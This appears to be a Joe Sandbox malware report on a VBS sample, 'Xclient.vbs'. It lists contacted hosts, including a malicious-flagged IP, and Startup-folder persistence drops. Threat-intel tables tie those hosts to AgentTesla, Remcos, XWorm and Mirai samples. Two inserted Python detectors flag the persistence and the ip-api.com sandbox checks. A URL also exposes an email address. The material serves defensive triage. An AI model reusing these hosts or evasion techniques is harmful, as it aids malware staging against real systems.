                http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://0x0.st | powershell.exe, 00000005.00000002.2325412269.000001D313C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CD0F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA55A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC07437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600C04000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://go.micro | powershell.exe, 00000005.00000002.2325412269.000001D3133E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://0x0.st | powershell.exe, 00000005.00000002.2325412269.000001D313B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CCDF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA4A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC0715A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.000002060022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600903000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://contoso.com/ | powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://contoso.com/License | powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://ip-api.com | powershell.exe, 00000005.00000002.2325412269.000001D3133DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://contoso.com/Icon | powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 0000001F.00000003.2316380909.00000286952A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.0000028695307000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | false | | high
                https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | false | | high
                https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-AS (US) | false
168.119.145.117 | 0x0.st | Germany | 24940 | HETZNER-AS (DE) | false
185.241.208.215 | unknown | Moldova, Republic of | 26636 | GBTCLOUD (US) | true
                                                                IP
                                                                127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1615978
Start date and time: 2025-02-15 20:42:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 71
Number of new started drivers analysed: 5
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Xclient.vbs
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winVBS@52/31@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 10
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .vbs
• Connection to analysis system has been lost, crash info: Unknown
• Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, smss.exe, dwm.exe, WMIADAP.exe, SIHClient.exe, csrss.exe, winlogon.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 2.19.106.160, 2.19.104.63, 23.60.201.147, 184.86.251.21, 184.86.251.8, 184.86.251.20, 184.86.251.12, 184.86.251.22, 184.86.251.4, 184.86.251.19, 184.86.251.27, 184.86.251.7, 40.126.32.140, 20.190.160.132, 40.126.32.133, 20.190.160.17, 40.126.32.74, 40.126.32.68, 20.190.160.5, 20.190.160.3, 2.19.96.129, 2.19.96.82, 2.19.96.91, 2.19.96.80, 2.19.96.90, 4.245.163.56, 13.107.246.61
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, cdn.onenote.net.edgekey.net, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, r.bing.com, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, www.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, e15275.d.akamaiedge.net, r.bing.com.edgekey.net, tile-service.weather.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e1553.dspg.akamaiedge.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:43:14 | API Interceptor | 346x Sleep call for process: powershell.exe modified
14:44:15 | API Interceptor | 2x Sleep call for process: svchost.exe modified
19:43:21 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd
19:43:35 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd
19:43:48 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd
19:44:01 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd
19:44:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c64e66cc.cmd
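The five Autostart rows above show the sample writing a fresh StartupScript_<8 hex chars>.cmd into the per-user Startup folder roughly every 13 seconds, each time under a new random name. The following triage helper is an added example and is not part of the Joe Sandbox report: it parses timeline rows in the flattened "<time><type><description>" layout the report uses, extracts the dropped paths, checks that they sit in the Startup folder and follow the generated-name pattern, and computes the re-drop cadence. The input rows are copied from the timeline; the regexes and function names are the example's own.

```python
"""Triage helper for the 'Autostart' rows of a sandbox timeline.

Added example, not part of the Joe Sandbox report. It parses rows of the form
'<HH:MM:SS><Type><Description>', pulls out the Startup-folder paths the sample
drops, and reports whether they share a generated naming pattern and how often
the sample re-drops them.
"""
import re
from datetime import datetime

# Constructed input: the five Autostart rows (plus one API Interceptor row)
# exactly as they appear in the report timeline.
TIMELINE_ROWS = [
    r"19:43:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd",
    r"19:43:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd",
    r"19:43:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd",
    r"19:44:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd",
    r"19:44:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c64e66cc.cmd",
    r"14:43:14API Interceptor346x Sleep call for process: powershell.exe modified",
]

# Row layout: time, then one of the report's Type values, then the description.
ROW_RE = re.compile(r"^(\d{2}:\d{2}:\d{2})(Autostart|API Interceptor)(.*)$")
# Per-user Startup folder; case-insensitive because NTFS paths are.
STARTUP_DIR_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
# Naming pattern observed in the report: fixed prefix + 8 hex chars + .cmd
GENERATED_NAME_RE = re.compile(r"^StartupScript_[0-9a-f]{8}\.cmd$", re.I)


def parse_rows(rows):
    """Split flattened timeline rows into (time, type, description) tuples."""
    parsed = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            parsed.append((m.group(1), m.group(2), m.group(3)))
    return parsed


def autostart_paths(rows):
    """Return (time, path) for every Autostart row that is a 'Run:' entry."""
    out = []
    for t, typ, desc in parse_rows(rows):
        if typ == "Autostart" and desc.startswith("Run: "):
            out.append((t, desc[len("Run: "):]))
    return out


def classify(path):
    """Label one dropped path: is it in the Startup folder, is the name generated?"""
    name = path.rsplit("\\", 1)[-1]
    return {
        "path": path,
        "name": name,
        "startup_dir": bool(STARTUP_DIR_RE.search(path)),
        "generated_name": bool(GENERATED_NAME_RE.match(name)),
    }


def redrop_intervals(rows):
    """Seconds between consecutive drops, to expose a periodic re-persistence loop."""
    times = [datetime.strptime(t, "%H:%M:%S") for t, _ in autostart_paths(rows)]
    return [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]


def triage(rows):
    """Summary of the autostart activity in a set of timeline rows."""
    entries = [classify(p) for _, p in autostart_paths(rows)]
    return {
        "drops": len(entries),
        "all_in_startup_dir": all(e["startup_dir"] for e in entries),
        "all_generated_names": all(e["generated_name"] for e in entries),
        "distinct_names": len({e["name"].lower() for e in entries}),
        "intervals_s": redrop_intervals(rows),
    }


if __name__ == "__main__":
    print(triage(TIMELINE_ROWS))
```

On the report's rows this yields five drops, five distinct generated names, all in the Startup folder, with intervals of 14, 13, 13 and 13 seconds. On a live host the same `classify` check can be applied to a directory listing of the Startup folder; a single stale StartupScript_*.cmd is a weak signal on its own, but several with different hex suffixes is the pattern this sample leaves behind.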
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | pile.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | GAj49U93sg.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | urzeK6y8gl.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | devuelto_89676464576485645876464646345433467574687744.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | NEW ORDER LISTED 2025 VENOKLER S.A PDF.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | kBcQHTMne6.ps1 | malicious | Unknown | ip-api.com/json
208.95.112.1 | Nuevo Orden_212435988.pdf____________________________.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | s.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 1.exe | malicious | RL STEALER, StormKitty | ip-api.com/xml
208.95.112.1 | payload.ps1 | malicious | Kdot Stealer | ip-api.com/json/
168.119.145.117 | OC 23558 EINSA F2420.vbs | malicious | Unknown |
168.119.145.117 | Teufelberger,pdf.vbs | malicious | Remcos, PureLog Stealer, zgRAT |
168.119.145.117 | REMMITTANCE ADVICE- 12.02.25_PNG.vbs | malicious | Unknown |
168.119.145.117 | Attached order.vbs | malicious | Unknown |
168.119.145.117 | tOpxHK0Z2U.bat | malicious | Remcos |
168.119.145.117 | 5kldoushde.bat | malicious | Remcos |
168.119.145.117 | puDUCOeVK6.bat | malicious | Remcos |
168.119.145.117 | As7KZaO9Dy.bat | malicious | Remcos |
168.119.145.117 | uowzo4rEa5.bat | malicious | Remcos |
168.119.145.117 | BNP_Paribas,pdf.vbs | malicious | Remcos |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | pile.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | GAj49U93sg.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | urzeK6y8gl.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | devuelto_89676464576485645876464646345433467574687744.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | NEW ORDER LISTED 2025 VENOKLER S.A PDF.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | kBcQHTMne6.ps1 | malicious | Unknown | 208.95.112.1
ip-api.com | Nuevo Orden_212435988.pdf____________________________.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | s.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | 1.exe | malicious | RL STEALER, StormKitty | 208.95.112.1
ip-api.com | payload.ps1 | malicious | Kdot Stealer | 208.95.112.1
0x0.st | OC 23558 EINSA F2420.vbs | malicious | Unknown | 168.119.145.117
0x0.st | Teufelberger,pdf.vbs | malicious | Remcos, PureLog Stealer, zgRAT | 168.119.145.117
0x0.st | REMMITTANCE ADVICE- 12.02.25_PNG.vbs | malicious | Unknown | 168.119.145.117
0x0.st | Attached order.vbs | malicious | Unknown | 168.119.145.117
0x0.st | tOpxHK0Z2U.bat | malicious | Remcos | 168.119.145.117
0x0.st | 5kldoushde.bat | malicious | Remcos | 168.119.145.117
0x0.st | puDUCOeVK6.bat | malicious | Remcos | 168.119.145.117
0x0.st | As7KZaO9Dy.bat | malicious | Remcos | 168.119.145.117
0x0.st | uowzo4rEa5.bat | malicious | Remcos | 168.119.145.117
0x0.st | BNP_Paribas,pdf.vbs | malicious | Remcos | 168.119.145.117
a-0003.a-msedge.net | H3Ze9Uj.exe | malicious | XWorm | 204.79.197.203
a-0003.a-msedge.net | QEIFBCQW.msi | malicious | Unknown | 204.79.197.203
a-0003.a-msedge.net | blessed.ps1 | malicious | FormBook | 204.79.197.203
a-0003.a-msedge.net | em3.ps1 | malicious | FormBook | 204.79.197.203
a-0003.a-msedge.net | _747031500 D747031500_A.html | malicious | Remcos | 204.79.197.203
a-0003.a-msedge.net | 747031500_D747031500_A.js | malicious | Remcos | 204.79.197.203
a-0003.a-msedge.net | CYA75gigem.exe | malicious | Vidar | 204.79.197.203
a-0003.a-msedge.net | N11R7lRasm.exe | malicious | Vidar | 204.79.197.203
a-0003.a-msedge.net | https://eur01.safelinks.protection.outlook.com/ap/w-59584e83/?url=https%3A%2F%2Finnerworks621-my.sharepoint.com%2F%3Aw%3A%2Fg%2Fpersonal%2Ffbayoumi_iwexpress_com%2FEV18-ULK3bBFgswwIocxhGgB_RycisFJYnuNE85X0INcoQ%3Fe%3DPJWGhb&data=05%7C02%7Cm.schwarzfaerber%40gutmann.de%7Cba71d958cbce4017fe2b08dd4c1498cf%7Cb8afaafb131d4ce28085e6ff7718d438%7C0%7C0%7C638750373515189602%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=jFoC7e8%2BnChKZDPYgfO8Z0D6BEVH0spDWEnRRVzuauE%3D&reserved=0 | malicious | Unknown | 204.79.197.203
a-0003.a-msedge.net | https://innerworks621-my.sharepoint.com/:w:/g/personal/fbayoumi_iwexpress_com/EV18-ULK3bBFgswwIocxhGgB_RycisFJYnuNE85X0INcoQ?rtime=X7A0bhVM3Ug | malicious | Unknown | 204.79.197.203
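The Context column in the two tables above shows the same pivot across unrelated families (AsyncRAT/XWorm, AgentTesla, StormKitty, Kdot Stealer): a request to ip-api.com, most often /line/?fields=hosting, which returns whether the caller's public IP belongs to a hosting, colocation or datacenter range and is used to spot sandboxes. The detector below is an added example, not part of the Joe Sandbox report: it runs over constructed proxy-style log lines (timestamp, client, host, request path; the addresses and timestamps are made up for the demo) and separates hosting-field checks from plain geolocation lookups. The endpoint strings are the ones from the Context column; everything else is the example's own.

```python
"""Flag ip-api.com lookups of the kind seen in the Context column above.

Added example, not part of the Joe Sandbox report. The endpoint strings come
from the report's Context column (ip-api.com/line/?fields=hosting, /json,
/json/, /xml); the log lines are constructed for the demo in a simple
'<timestamp> <client> <host> <request path>' format.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-style log lines (not from the report).
LOG_LINES = [
    "2025-02-15T19:43:20Z 10.0.0.5 ip-api.com /line/?fields=hosting",
    "2025-02-15T19:43:22Z 10.0.0.7 ip-api.com /json",
    "2025-02-15T19:43:25Z 10.0.0.9 ip-api.com /xml",
    "2025-02-15T19:43:30Z 10.0.0.5 www.bing.com /",
    "2025-02-15T19:43:31Z 10.0.0.7 0x0.st /abcd.txt",
    "2025-02-15T19:43:40Z 10.0.0.5 ip-api.com /line/?fields=hosting",
]

LOOKUP_HOSTS = {"ip-api.com"}
# ip-api.com's 'hosting' field reports whether the caller's IP belongs to a
# hosting/colocation/datacenter range; malware uses it as a sandbox check.
EVASION_FIELDS = {"hosting"}


def parse_line(line):
    """Split a constructed log line into its four fields."""
    ts, client, host, path = line.split(" ", 3)
    return {"ts": ts, "client": client, "host": host.lower(), "path": path}


def classify_request(host, path):
    """Return None for unrelated traffic, otherwise a label for the lookup."""
    if host.lower() not in LOOKUP_HOSTS:
        return None
    parts = urlsplit(path)
    fields = set()
    # 'fields' may be repeated or comma-separated: fields=hosting,proxy
    for value in parse_qs(parts.query).get("fields", []):
        fields.update(f.strip().lower() for f in value.split(","))
    if fields & EVASION_FIELDS:
        return "geo_lookup_hosting_check"   # datacenter/sandbox detection
    return "geo_lookup"                      # plain public-IP geolocation


def detect(lines):
    """Return one finding per matching line, plus lookup counts per client."""
    findings, per_client = [], {}
    for raw in lines:
        rec = parse_line(raw)
        label = classify_request(rec["host"], rec["path"])
        if label is None:
            continue
        rec["label"] = label
        findings.append(rec)
        per_client[rec["client"]] = per_client.get(rec["client"], 0) + 1
    return findings, per_client


if __name__ == "__main__":
    found, counts = detect(LOG_LINES)
    for f in found:
        print(f["ts"], f["client"], f["label"], f["host"] + f["path"])
    print("lookups per client:", counts)
```

The hosting-field variant is the higher-fidelity signal: legitimate software that geolocates its own public IP rarely asks only for that field, and a client that repeats the query (10.0.0.5 above) matches the behaviour of a loader re-checking its environment. The plain /json and /xml lookups are weaker on their own and are best correlated with the client process, which this log format does not carry.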
Match | Associated Sample Name / URL | Detection | Threat Name | Context
GBTCLOUD (US) | XClient.exe | malicious | XWorm | 45.83.244.141
GBTCLOUD (US) | res.arm5.elf | malicious | Unknown | 216.115.185.244
GBTCLOUD (US) | Ayedz.sh4.elf | malicious | Mirai, Gafgyt | 45.13.151.59
GBTCLOUD (US) | apache2.elf | malicious | Mirai, Gafgyt | 45.13.151.59
GBTCLOUD (US) | Ayedz.x86.elf | malicious | Mirai, Gafgyt | 45.13.151.59
GBTCLOUD (US) | Ayedz.mips.elf | malicious | Mirai, Gafgyt | 45.13.151.59
GBTCLOUD (US) | Ayedz.ppc.elf | malicious | Mirai, Gafgyt | 45.13.151.59
GBTCLOUD (US) | sh.elf | malicious | Mirai, Gafgyt | 45.13.151.59
GBTCLOUD (US) | Ayedz.m68k.elf | malicious | Mirai, Gafgyt | 45.13.151.59
GBTCLOUD (US) | Ayedz.Armv61.elf | malicious | Mirai, Gafgyt | 45.13.151.59
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242
HETZNER-AS (DE) | na.elf | malicious | Prometei | 88.198.246.242